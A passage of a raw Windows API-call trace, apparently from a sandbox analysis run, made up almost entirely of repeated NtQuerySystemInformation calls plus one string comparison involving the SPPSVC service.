NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0273.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb28, Length=0x50, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x28, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x50, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0273.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x28, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0273.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.711] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b8, Length=0x50, ResultLength=0x0) [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x28, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0273.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x50, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x38, ResultLength=0x0) [0273.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.738] NtQuerySystemInformation 